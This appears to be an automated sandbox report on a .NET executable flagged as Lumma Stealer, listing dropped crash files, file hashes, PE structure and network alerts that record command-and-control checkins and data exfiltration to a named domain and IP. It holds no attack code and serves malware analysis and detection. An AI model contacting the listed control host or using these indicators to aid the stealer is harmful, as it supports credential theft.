C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Rgr8LJz.exe_41612d26a46917a1f598b16129f1566561cb9f0_36f8f177_c1019844-5e7a-4c7a-884e-1dfe5128f5e8\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8927045903259268
Encrypted:	false
SSDEEP:	96:cJiGSFtbZdcks+t9jTOAqyS3QXIDcQlc6VcEdcw3iH++BHUHZ0ownOgHkEwH3dE2:JzZOkgA0LR3kaGGzuiFcsZ24IO8AZ
MD5:	4046B6712BF330AFF38B80AB017CECD5
SHA1:	1D59AFCA5BF9AF6F08AC7E9ED3CBA9371C055246
SHA-256:	B100CBFAE62FD1167133A49646616054E9BF5ACB3F9EEEE1E06216B2974871C6
SHA-512:	7DBDC9985118945D08E41ABD31C926FA7FDE6BC7268B2CAF6C658278D038D52ED8670B28CB246E4A3610E2AEB1B50783451F23236A55F3EDF910BF8616D19A8B
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.1.4.6.7.5.1.3.5.1.9.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.1.4.6.7.5.6.5.0.8.2.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.1.0.1.9.8.4.4.-.5.e.7.a.-.4.c.7.a.-.8.8.4.e.-.1.d.f.e.5.1.2.8.f.5.e.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.2.6.6.a.b.2.-.3.9.8.c.-.4.8.5.a.-.b.8.4.f.-.e.e.b.a.4.f.2.e.e.1.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.g.r.8.L.J.z...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.r.a.s.d.l.u.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.6.c.-.0.0.0.1.-.0.0.1.4.-.f.e.4.1.-.c.7.e.e.c.c.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.9.c.7.0.1.5.2.1.1.1.1.7.5.9.b.d.9.b.5.0.9.9.5.7.1.c.0.3.3.d.0.0.0.0.0.9.0.4.!.0.0.0.0.9.9.b.b.4.d.c.e.e.2.b.a.8.6.b.0.f.6.2.2.0.e.c.b.e.f.f.f.d.1.7.0.0.e.4.4.b.a.7.1.!.R.g.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9626.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jan 8 12:57:55 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	154192
Entropy (8bit):	3.7625477649794963
Encrypted:	false
SSDEEP:	1536:xFMJAYOABR9tThzuBojRWpN4uE2aO5MLCDSLTgUi:xmJAYPNdg4uEq5fSLTgU
MD5:	6DCB0611FBB09F7E65D8A908B9F1B7DA
SHA1:	604064D4AB1C2571A7E50C50B35321CD47168F17
SHA-256:	D75098D242ADFF27F25EA8F70D92FBB47055150E4F9E9257A0EB20FBD3252BE3
SHA-512:	4F39419F36457D349E6B7066FF65B4BB6CC0132A4D1A5ACBAF6AAE2CDDC9AECEBB5667C047A65D1F52BBA39411E8F2A5ADE7EF4C5BAB73A52FCA1FDD07483644
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......Sv~g....................................$...........D..../..........`.......8...........T...........x$...5......................................................................................................eJ......P.......GenuineIntel............T.......l...Rv~g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER975F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8384
Entropy (8bit):	3.6975899802704486
Encrypted:	false
SSDEEP:	192:R6l7wVeJmM656Y9PSU9Uk2ogmfZrVJTprt89bUUusfBmCm:R6lXJ1656YVSU9UtogmfZrVJkUUtfAT
MD5:	D28DE7D12925A107C7A81A43A2A938FB
SHA1:	7C52C3D1152A92E7A8429AF1CBC6F6BD2EFC6D90
SHA-256:	E00E295B8BBFB492A75C3B0BE861987877786B3798D8A4556541A18F463107F6
SHA-512:	1ECE544C2F7DE64CC857D1A8B6F500AE80AEDA86D2098BCEFB11B6915F0708AB3B12ACF67716DE548A3D252DC2205D6E8CFDA733C41C62800F0E2E80C31FCC61
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER978F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4755
Entropy (8bit):	4.46634196927398
Encrypted:	false
SSDEEP:	48:cvIwWl8zsR7Jg77aI952MyWpW8VYlYm8M4JhSdxPcf6FP+q8vdSdxPcfvQMum59d:uIjfRVI772k7VZJhnfIKdnfvQM559d
MD5:	F35809E9260CB560E18155BAC3ADEEA3
SHA1:	1C2953103B25827A76129BA877A1B75D2B13F6EA
SHA-256:	6F27CBF83EFAE6B2E82A1944F5E5F5FE9E008C9CF0645AA1F9611A6C457F1C5B
SHA-512:	DFEF2B1C8A6CACC33383AF6E2E229845C64A0C4E634252B36F79C9B8852B8A1D5D5967574ED7B8F371CB1C81A547FC438333B8F884FC00CC79FE47D63AD83C7C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666960" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466129060486366
Encrypted:	false
SSDEEP:	6144:3IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNadwBCswSbD:4XD94+WlLZMM6YFH8+D
MD5:	C177D46DE0C8705B8CA7D3A475D55569
SHA1:	4362A5AF40F9EF4047A07CBF298C76C6DA3B95BE
SHA-256:	C2B9A103D52D3A0E19C7C704050E7E84EE920B27AD3148BBB04B1CC90E903A98
SHA-512:	D18A1E1BB01923DDE32150A25B35A2A02ED139E9CE3C07022664A4AA6663E878AAD89918661DCD3582BCA71CC867A4ABBDBBAC9817D49422809944D4B8E82E37
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ....a.............................................................................................................................................................................................................................................................................................................................................. Y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.962963905942242
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Rgr8LJz.exe
File size:	347'648 bytes
MD5:	20155323669fd610a0c7201be666fbd6
SHA1:	99bb4dcee2ba86b0f6220ecbefffd1700e44ba71
SHA256:	586b3a854631ed30c8aefbde7edcf3a725d7c40a4a56c8ebc17aeb64979ea442
SHA512:	338382b16e2cd2b3edce364aa2f92281769ee39dcfb990b6da94dcac477df9c29ef25636026e5a8491e5a3fe2c24b04d501b94e72935501a32af1db8d5d196c9
SSDEEP:	6144:yZZzgHPaRciI8PDjb17g5esNPwOR716Z6NWk8C93PG+gHT8oAu7us9SOv3KZts:y/Dq18PDdJNOR7cZdk8CZBiT8obus9Lj
TLSH:	0174134EF28F8673DCDE8B359180868072726765DC7B5E7F399D212BCE4A4390236366
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5................0..D...........b... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4062ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xFDE635DB [Fri Dec 26 08:18:35 2104 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x62a0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x622	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6256	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x42f4	0x4400	29cbbbb722b7fc8767bdc6c90c7a619c	False	0.5066061580882353	data	5.893234630300136	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x622	0x800	475a49e737227fab34df740bd3b803cb	False	0.35693359375	data	3.5546778997020008	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	8a8b2abc4c357fd26f3ff0a207ef381f	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0xc000	0x4fc00	0x4fc00	da81887a1abd34b3aaf8752dd728a15e	False	1.0003245003918495	data	7.9994100941957225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80a0	0x398	OpenPGP Secret Key	English	United States	0.45760869565217394
RT_MANIFEST	0x8438	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T13:57:55.981472+0100	2058638	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click)	1	192.168.2.4	64606	1.1.1.1	53	UDP
2025-01-08T13:57:56.472148+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49730	104.21.4.114	443	TCP
2025-01-08T13:57:56.472148+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.4.114	443	TCP
2025-01-08T13:57:56.941881+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.4.114	443	TCP
2025-01-08T13:57:56.941881+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.4.114	443	TCP
2025-01-08T13:57:57.426089+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49732	104.21.4.114	443	TCP
2025-01-08T13:57:57.426089+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.4.114	443	TCP
2025-01-08T13:57:57.967721+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49732	104.21.4.114	443	TCP
2025-01-08T13:57:57.967721+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.4.114	443	TCP
2025-01-08T13:57:58.747803+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49734	104.21.4.114	443	TCP
2025-01-08T13:57:58.747803+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.4.114	443	TCP
2025-01-08T13:57:59.912318+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49738	104.21.4.114	443	TCP
2025-01-08T13:57:59.912318+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.4.114	443	TCP
2025-01-08T13:58:00.976526+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49739	104.21.4.114	443	TCP
2025-01-08T13:58:00.976526+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.4.114	443	TCP
2025-01-08T13:58:02.524982+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49741	104.21.4.114	443	TCP
2025-01-08T13:58:02.524982+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.4.114	443	TCP
2025-01-08T13:58:02.997634+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49741	104.21.4.114	443	TCP
2025-01-08T13:58:03.833728+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49742	104.21.4.114	443	TCP
2025-01-08T13:58:03.833728+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.4.114	443	TCP
2025-01-08T13:58:13.622738+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	49748	104.21.4.114	443	TCP
2025-01-08T13:58:13.622738+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49748	104.21.4.114	443	TCP
2025-01-08T13:58:14.109483+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49748	104.21.4.114	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 13:57:55.999577045 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:55.999624968 CET	443	49730	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:55.999720097 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.002621889 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.002631903 CET	443	49730	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:56.471832991 CET	443	49730	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:56.472147942 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.488838911 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.488856077 CET	443	49730	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:56.489128113 CET	443	49730	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:56.542048931 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.544408083 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.544430017 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.544529915 CET	443	49730	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:56.941885948 CET	443	49730	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:56.941983938 CET	443	49730	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:56.942045927 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.943629026 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.943659067 CET	443	49730	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:56.943674088 CET	49730	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.943680048 CET	443	49730	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:56.950858116 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.950895071 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:56.950975895 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.951756954 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:56.951771021 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.426014900 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.426089048 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:57.457525969 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:57.457556963 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.457863092 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.510802984 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:57.513294935 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:57.513400078 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:57.513442993 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.967725039 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.967782021 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.967812061 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.967839003 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.967858076 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:57.967864037 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.967874050 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.967935085 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:57.968323946 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.968378067 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.968409061 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.968432903 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.968461990 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:57.968472958 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.968487024 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:57.972351074 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:57.974236965 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:57.974242926 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.026549101 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.058057070 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.058131933 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.058161020 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.058211088 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.058238029 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.058262110 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.058346033 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.090259075 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.090281963 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.090306997 CET	49732	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.090313911 CET	443	49732	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.287225008 CET	49734	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.287272930 CET	443	49734	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.287483931 CET	49734	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.287904024 CET	49734	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.287919998 CET	443	49734	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.747694969 CET	443	49734	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.747802973 CET	49734	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.749279976 CET	49734	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.749286890 CET	443	49734	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.749516964 CET	443	49734	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.756474018 CET	49734	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.756665945 CET	49734	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.756690979 CET	443	49734	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:58.756778002 CET	49734	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:58.756784916 CET	443	49734	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:59.415127993 CET	443	49734	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:59.415231943 CET	443	49734	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:59.415285110 CET	49734	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:59.415529013 CET	49734	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:59.415546894 CET	443	49734	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:59.437021017 CET	49738	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:59.437071085 CET	443	49738	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:59.437146902 CET	49738	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:59.437542915 CET	49738	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:59.437562943 CET	443	49738	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:59.912246943 CET	443	49738	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:59.912317991 CET	49738	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:59.914041996 CET	49738	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:59.914062977 CET	443	49738	104.21.4.114	192.168.2.4
Jan 8, 2025 13:57:59.914318085 CET	443	49738	104.21.4.114	192.168.2.4
